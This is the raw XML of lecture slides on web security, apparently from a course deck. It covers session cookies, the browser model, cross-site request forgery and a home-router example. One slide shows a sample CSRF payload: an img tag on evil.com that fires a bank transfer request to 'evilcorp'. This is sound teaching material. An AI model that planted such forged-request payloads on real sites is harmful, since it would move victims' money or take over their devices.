              <a:rPr sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>...intentional or not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6" name="PlaceHolder 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1219200"/>
            <a:ext cx="8229240" cy="609000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6038" rIns="0" bIns="46038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sz="2800" b="0" spc="-1" dirty="0">
                <a:latin typeface="Cambria"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recall: Session Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152655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" grpId="0"/>
      <p:bldP spid="840" grpId="0"/>
      <p:bldP spid="842" grpId="0"/>
      <p:bldP spid="846" grpId="0"/>
      <p:bldP spid="847" grpId="0"/>
      <p:bldP spid="848" grpId="0"/>
      <p:bldP spid="849" grpId="0" animBg="1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" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7036560" y="2759760"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="851" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180800" y="990720"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="852" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2269440" y="5364000"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="853" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837200" y="4105080"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="854" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1185120" y="3989520"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6921720" y="2367720"/>
            <a:ext cx="1302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bank.com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56" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1164960" y="3620160"/>
            <a:ext cx="1145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evil.com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57" name="Straight Arrow Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="1447920"/>
            <a:ext cx="3733560" cy="837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58" name="Picture 15"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411840" y="1905120"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="TextBox 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267440" y="1219680"/>
            <a:ext cx="3564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Authenticates with bank.com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60" name="Straight Arrow Connector 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3353400" y="1866600"/>
            <a:ext cx="3580560" cy="86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61" name="Picture 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282000" y="2813760"/>
            <a:ext cx="596880" cy="606960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862" name="Straight Arrow Connector 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3192480" y="2367720"/>
            <a:ext cx="3733560" cy="837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63" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033920" y="2867760"/>
            <a:ext cx="4789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/transfer?amount=500&amp;dest=grandson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64" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067440" y="5244480"/>
            <a:ext cx="3249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Cookie checks out!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Sending $500 to grandson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" name="Picture 4" descr="http://i.i.cbsi.com/cnwk.1d/i/tim/2011/03/16/Chrome-logo-2011-03-16.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876700" y="1752600"/>
            <a:ext cx="704700" cy="6651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60472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006 3.7037E-007 L 1.94444E-006 0.00023 C -0.00504 -0.00116 -0.00972 -0.00185 -0.01441 -0.00278 C -0.02552 -0.00532 -0.01042 -0.00324 -0.02413 -0.00556 C -0.02761 -0.00602 -0.0309 -0.00602 -0.03403 -0.00671 C -0.05816 -0.01134 -0.03195 -0.0081 -0.05816 -0.01065 L -0.09896 -0.01852 C -0.09896 -0.01829 -0.12743 -0.02384 -0.12743 -0.02361 L -0.13872 -0.02523 C -0.14306 -0.02639 -0.14705 -0.02824 -0.15156 -0.02917 C -0.16354 -0.03218 -0.16858 -0.03218 -0.18125 -0.0331 C -0.18542 -0.03403 -0.18976 -0.03449 -0.19393 -0.03565 C -0.2033 -0.03819 -0.2125 -0.04167 -0.22205 -0.04352 C -0.22639 -0.04468 -0.23056 -0.04491 -0.2349 -0.0463 C -0.2382 -0.04722 -0.24097 -0.04954 -0.24462 -0.05023 C -0.25313 -0.05139 -0.26163 -0.05093 -0.27014 -0.05139 C -0.28785 -0.05556 -0.26597 -0.05046 -0.28021 -0.05417 C -0.28195 -0.05463 -0.28386 -0.05486 -0.28577 -0.05532 C -0.28715 -0.05579 -0.28854 -0.05648 -0.29011 -0.05694 C -0.29636 -0.05833 -0.31389 -0.0625 -0.32101 -0.06319 L -0.33229 -0.06482 C -0.35799 -0.07269 -0.32604 -0.06319 -0.34792 -0.06875 C -0.35087 -0.06921 -0.35365 -0.07037 -0.35643 -0.0713 C -0.3592 -0.07199 -0.36181 -0.07338 -0.36493 -0.07384 L -0.37205 -0.07523 C -0.37379 -0.07593 -0.37552 -0.07732 -0.37761 -0.07778 C -0.38143 -0.0787 -0.38524 -0.07847 -0.38906 -0.07917 C -0.39028 -0.0794 -0.39167 -0.08009 -0.39323 -0.08056 C -0.39584 -0.08102 -0.39879 -0.08125 -0.40174 -0.08171 C -0.40469 -0.08241 -0.40729 -0.08357 -0.41024 -0.08449 C -0.41146 -0.08495 -0.41285 -0.08542 -0.41441 -0.08565 C -0.41615 -0.08611 -0.41823 -0.08657 -0.41997 -0.08704 C -0.44097 -0.09306 -0.4257 -0.08935 -0.43837 -0.09236 C -0.43993 -0.09329 -0.44097 -0.09421 -0.44254 -0.09491 C -0.44549 -0.09607 -0.44844 -0.09676 -0.45104 -0.09769 L -0.46389 -0.10162 L -0.47222 -0.10417 C -0.47379 -0.10463 -0.47518 -0.10556 -0.47656 -0.10556 L -0.47952 -0.10556 L -0.48629 -0.10787 E">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="2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629 -0.10787 L -0.00295 0.05417 E">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="2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Basic Browser Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1371600"/>
            <a:ext cx="7543440" cy="4754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500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/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latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Window or frame loads content</a:t>
            </a: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latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Renders content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Parse HTML, scripts, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Run scripts, plugins, etc.</a:t>
            </a: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latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Responds to events</a:t>
            </a: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mbria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mbria"/>
              </a:rPr>
              <a:t>Event examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>User actions: OnClick, OnMouseover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Rendering: OnLoad, OnBeforeUnload, onerror</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635040" lvl="1" indent="-2919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mbria"/>
              </a:rPr>
              <a:t>Timing: setTimeout(),  clearTimeout() </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="615" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="433080" y="1718280"/>
            <a:ext cx="759960" cy="1592640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="760258" h="1592861">
                <a:moveTo>
                  <a:pt x="732192" y="1538941"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="763319" y="1589990"/>
                  <a:pt x="794447" y="1641039"/>
                  <a:pt x="672427" y="1509059"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="550407" y="1377079"/>
                  <a:pt x="-7397" y="998569"/>
                  <a:pt x="74" y="747059"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7545" y="495549"/>
                  <a:pt x="717251" y="0"/>
                  <a:pt x="717251" y="0"/>
                </a:cubicBez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8322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5" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7036560" y="2759760"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="866" name="Picture 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180800" y="990720"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="867" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1946160" y="5189040"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="868" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837200" y="4105080"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="869" name="Picture 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762120" y="4206600"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="870" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6921720" y="2367720"/>
            <a:ext cx="1302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bank.com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1" name="TextBox 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059840" y="3736800"/>
            <a:ext cx="1145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evil.com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872" name="Picture 15"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411840" y="1905120"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="873" name="Picture 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3153600" y="937800"/>
            <a:ext cx="596880" cy="606960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="874" name="TextBox 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3816000" y="1432080"/>
            <a:ext cx="4923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/transfer?amount=10000&amp;dest=evilcorp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5" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874840" y="5287320"/>
            <a:ext cx="3460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Cookie checks out!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Sending $10000 to EvilCorp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6" name="Straight Arrow Connector 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905120" y="2286000"/>
            <a:ext cx="360" cy="13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7" name="Straight Arrow Connector 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2238840" y="2285280"/>
            <a:ext cx="360" cy="133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8" name="TextBox 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2128680" y="2904120"/>
            <a:ext cx="444672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&lt;img src=“http://bank.com/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</a:rPr>
              <a:t>transfer?amount=10000&amp;id=evilcorp”&gt;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79" name="Straight Arrow Connector 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3385080" y="1820160"/>
            <a:ext cx="3548880" cy="118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0" name="Straight Arrow Connector 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2554920" y="4206600"/>
            <a:ext cx="4073400" cy="59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1" name="TextBox 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4147200" y="4625640"/>
            <a:ext cx="1048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$10000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882" name="Picture 31"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="331560" y="1831680"/>
            <a:ext cx="1237320" cy="1248480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 4" descr="http://i.i.cbsi.com/cnwk.1d/i/tim/2011/03/16/Chrome-logo-2011-03-16.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876700" y="1752600"/>
            <a:ext cx="704700" cy="6651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4890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pat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006 -5.55556E-006 C 0.01771 0.0118 0.00191 -0.000240000000000001 0.01302 0.01157 C 0.02083 0.0199 0.01823 0.0155 0.02621 0.02175 C 0.02969 0.02453 0.03264 0.02823 0.03611 0.03055 C 0.03889 0.03263 0.04219 0.03333 0.04496 0.03495 C 0.04618 0.03587 0.04705 0.03726 0.04826 0.03796 C 0.05 0.03911 0.05191 0.03981 0.05382 0.04097 C 0.06111 0.04513 0.06857 0.0493 0.07569 0.05416 C 0.08316 0.05902 0.08906 0.06319 0.0967 0.06736 C 0.09878 0.06851 0.10104 0.06898 0.1033 0.07013 C 0.11094 0.0743 0.11823 0.08009 0.12621 0.08333 C 0.13003 0.08495 0.13368 0.08611 0.13732 0.08773 C 0.14062 0.08935 0.14392 0.09189 0.14722 0.09374 C 0.15 0.09513 0.15312 0.09629 0.1559 0.09814 C 0.15816 0.0993 0.16024 0.10138 0.1625 0.10254 C 0.16962 0.10578 0.16597 0.10208 0.17135 0.10532 C 0.19479 0.11967 0.17048 0.10624 0.19219 0.11851 C 0.1941 0.11967 0.19583 0.12083 0.19774 0.12152 C 0.20642 0.12499 0.2 0.12106 0.20764 0.1243 C 0.21059 0.12569 0.21354 0.12754 0.21649 0.1287 C 0.23611 0.13796 0.23073 0.13587 0.24496 0.1405 C 0.24601 0.14143 0.24705 0.14259 0.24826 0.14351 C 0.25 0.14467 0.25191 0.1456 0.25382 0.14629 C 0.2592 0.14884 0.26476 0.15115 0.27031 0.1537 L 0.27691 0.15671 C 0.27795 0.15717 0.27899 0.15763 0.28021 0.1581 C 0.2816 0.15856 0.28316 0.15879 0.28455 0.15948 C 0.28455 0.15948 0.29548 0.16689 0.29774 0.16828 C 0.29913 0.16944 0.30052 0.1706 0.30208 0.17129 C 0.30434 0.17222 0.3066 0.17314 0.30868 0.1743 C 0.31302 0.17638 0.31371 0.17708 0.31753 0.1787 C 0.31892 0.17916 0.32048 0.17962 0.32187 0.18009 C 0.32378 0.18148 0.32552 0.1831 0.32743 0.18448 C 0.32917 0.18564 0.33125 0.18611 0.33298 0.18749 C 0.33455 0.18865 0.33576 0.1905 0.33732 0.19189 C 0.33837 0.19259 0.33958 0.19259 0.34062 0.19328 C 0.34219 0.19421 0.34357 0.19513 0.34496 0.19629 C 0.34618 0.19768 0.34705 0.1993 0.34826 0.20069 C 0.34982 0.20231 0.35625 0.20717 0.35712 0.20786 C 0.35816 0.20879 0.3592 0.20995 0.36042 0.21087 C 0.3618 0.21203 0.36337 0.21296 0.36476 0.21388 C 0.36927 0.2162 0.36701 0.21365 0.36927 0.21666 L 0.36927 0.21828 E">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="20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Now lets see what CSRF is?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="884" name="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240" cy="4754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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="1" u="sng" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>CSRF attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Cambria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causes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>forces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the end user browser to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A50021"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>execute unwanted actions </a:t>
            </a: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on a web application in which it is currently authenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" spc="-1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Cambria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Cambria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Cambria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5060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Another Example: Home Router</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="886" name="Text Box 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4066200" y="1981080"/>
            <a:ext cx="167328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  <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Home router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87" name="Group 48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1600200" y="4018320"/>
            <a:ext cx="5568480" cy="1176480"/>
            <a:chOff x="1600200" y="4018320"/>
            <a:chExt cx="5568480" cy="1176480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="888" name="Straight Arrow Connector 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1600200" y="4101840"/>
              <a:ext cx="5568480" cy="1092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9" name="TextBox 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="540000">
              <a:off x="2891880" y="4245120"/>
              <a:ext cx="293184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Cambria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック"/>
                </a:rPr>
                <a:t>3. malicious page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90" name="Group 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1513800" y="3025440"/>
            <a:ext cx="2843640" cy="1076040"/>
            <a:chOff x="1513800" y="3025440"/>
            <a:chExt cx="2843640" cy="1076040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="891" name="TextBox 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20410800">
              <a:off x="1512000" y="3376440"/>
              <a:ext cx="213480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Cambria"/>
                  <a:ea typeface="ＭＳ Ｐゴシック"/>
                </a:rPr>
                <a:t>4. configs access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892" name="Straight Arrow Connector 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1600200" y="3071880"/>
              <a:ext cx="2757240" cy="1029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893" name="Picture 2" descr="http://www.usc-b2b.com/UNIQUE/images/L2100001.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="21346" t="5802" r="17415" b="8797"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4357800" y="2347920"/>
            <a:ext cx="1037880" cy="1447560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="894" name="Rounded Rectangular Callout 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094440" y="1600200"/>
            <a:ext cx="2744280" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80881"/>
              <a:gd name="adj2" fmla="val 51198"/>
              <a:gd name="adj3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ambria"/>
              </a:rPr>
              <a:t>Attacker can enable remote admin, reset password, etc.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95" name="Rounded Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="27360" y="3797280"/>
            <a:ext cx="1572480" cy="609120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj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Cambria"/>
              </a:rPr>
              <a:t>Browser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96" name="Rounded Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248520" y="5195160"/>
            <a:ext cx="1840680" cy="60912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>
            <a:solidFill>
              <a:srgbClr val="71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Cambria"/>
              </a:rPr>
              <a:t>Attacker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897" name="Group 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="813960" y="2634840"/>
            <a:ext cx="3543480" cy="1162080"/>
            <a:chOff x="813960" y="2634840"/>
